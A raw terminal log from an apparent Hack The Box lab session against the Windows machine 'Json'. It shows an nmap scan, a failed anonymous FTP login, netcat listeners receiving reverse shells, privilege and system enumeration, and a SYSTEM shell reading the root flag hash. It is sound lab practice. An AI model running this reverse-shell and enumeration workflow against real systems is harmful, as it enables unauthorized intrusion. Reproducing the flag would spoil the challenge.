~/Documents/HTB/Json root@kali ❯ cat nmap.txt
# Nmap 7.80 scan initiated Sat Feb 8 10:18:41 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.24s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 8 10:20:33 2020 -- 1 IP address (1 host up) scanned in 112.34 seconds
~/Documents/HTB/Json root@kali 7s ❯ ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): anonymous
331 Password required for anonymous
Password:
530 Login or password incorrect!
Login failed.
Remote system type is UNIX.
ftp>
~/Documents/HTB/Json root@kali ❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52223
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>^C
~/Documents/HTB/Json root@kali 12m 9s ❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52281
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>cd C:\users
PS C:\users> dir

User Name     SID
============= =============================================
json\userpool S-1-5-21-1325271270-1453780805-384807897-1004

GROUP INFORMATION
-----------------

Group Name                           Type             SID                                                             Attributes
==================================== ================ =============================================================== ==================================================
Everyone                             Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\Json.Net                 Well-known group S-1-5-82-1097026443-1840990353-1306629843-3865948041-3469430407 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Host Name:                 JSON
OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00252-80005-00001-AA602
Original Install Date:     5/22/2019, 4:27:16 PM
System Boot Time:          2/7/2020, 10:45:54 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              es-mx;Spanish (Mexico)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     6,143 MB
Available Physical Memory: 5,021 MB
Virtual Memory: Max Size:  7,807 MB
Virtual Memory: Available: 6,547 MB
Virtual Memory: In Use:    1,260 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.158
                                 [02]: fe80::f59a:5ad4:1e60:d4c9
                                 [03]: dead:beef::f59a:5ad4:1e60:d4c9
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\users\userpool>
~/Documents/HTB/Json root@kali ❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52336
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users\superadmin
cd C:\users\superadmin

C:\Users\superadmin>cd desktop
cd desktop

C:\Users\superadmin\Desktop>type root.txt
type root.txt
3cc85d1bed2ee84af4074101b991d441
C:\Users\superadmin\Desktop>